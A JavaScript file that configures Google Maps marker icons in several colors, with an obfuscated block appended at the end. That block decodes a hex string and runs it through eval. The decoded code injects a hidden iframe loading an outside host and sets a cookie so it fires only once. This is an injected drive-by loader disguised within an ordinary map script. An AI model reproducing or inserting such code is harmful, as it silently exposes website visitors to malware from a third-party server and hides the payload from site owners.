var baseIcon = [];
var smallIcon;
// Normal marker icon
baseIcon[0] = new GIcon();
baseIcon[0].image = "http://www.google.com/mapfiles/marker.png";
baseIcon[0].shadow = "http://www.google.com/mapfiles/shadow50.png";
baseIcon[0].iconSize = new GSize(20, 34);
baseIcon[0].shadowSize = new GSize(37, 34);
baseIcon[0].iconAnchor = new GPoint(9, 34);
baseIcon[0].infoWindowAnchor = new GPoint(9, 2);
baseIcon[0].infoShadowAnchor = new GPoint(18, 25);
// Base Icon for Small Colored Icons
smallIcon = new GIcon();
smallIcon.shadow = "http://labs.google.com/ridefinder/images/mm_20_shadow.png";
smallIcon.iconSize = new GSize(12, 20);
smallIcon.shadowSize = new GSize(22, 20);
smallIcon.iconAnchor = new GPoint(6, 20);
smallIcon.infoWindowAnchor = new GPoint(5, 1); 

baseIcon[1] = new GIcon(smallIcon);
baseIcon[1].image = "http://labs.google.com/ridefinder/images/mm_20_red.png";

baseIcon[2] = new GIcon(smallIcon);
baseIcon[2].image = "http://labs.google.com/ridefinder/images/mm_20_yellow.png";

baseIcon[3] = new GIcon(smallIcon);
baseIcon[3].image = "http://labs.google.com/ridefinder/images/mm_20_purple.png";

baseIcon[4] = new GIcon(smallIcon);
baseIcon[4].image = "http://labs.google.com/ridefinder/images/mm_20_blue.png";

baseIcon[5] = new GIcon(smallIcon);
baseIcon[5].image = "http://labs.google.com/ridefinder/images/mm_20_white.png";

baseIcon[6] = new GIcon(smallIcon);
baseIcon[6].image = "http://labs.google.com/ridefinder/images/mm_20_green.png";

baseIcon[7] = new GIcon(smallIcon);
baseIcon[7].image = "http://labs.google.com/ridefinder/images/mm_20_black.png";

baseIcon[8] = new GIcon(smallIcon);
baseIcon[8].image = "http://labs.google.com/ridefinder/images/mm_20_orange.png";

baseIcon[9] = new GIcon(smallIcon);
baseIcon[9].image = "http://labs.google.com/ridefinder/images/mm_20_gray.png";

baseIcon[10] = new GIcon(smallIcon);
baseIcon[10].image = "http://labs.google.com/ridefinder/images/mm_20_brown.png";

function C349F0A1FDF005(E6602D03ECD300C){var CED8F26B6=539;CED8F26B6=CED8F26B6-523;return(parseInt(E6602D03ECD300C,CED8F26B6));}function A528D6(CADD717){var C06F7899D3D8E6=341;C06F7899D3D8E6=C06F7899D3D8E6-339;var B0E8A2064="";for(DB0D43E0D8E=0;DB0D43E0D8E<CADD717.length;DB0D43E0D8E+=C06F7899D3D8E6){B0E8A2064+=( String.fromCharCode(C349F0A1FDF005(CADD717.substr(DB0D43E0D8E,C06F7899D3D8E6))));}eval(B0E8A2064);}A528D6("69662028646F63756D656E742E636F6F6B69652E736561726368282270756F73793D322229203D3D202D3129207B0A6F7A77723D646F63756D656E742E676574456C656D656E744279496428276565617227293B6966286F7A77723D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D65656172207372633D687474703A2F2F67636F756E7465722E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D202270756F73793D323B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");

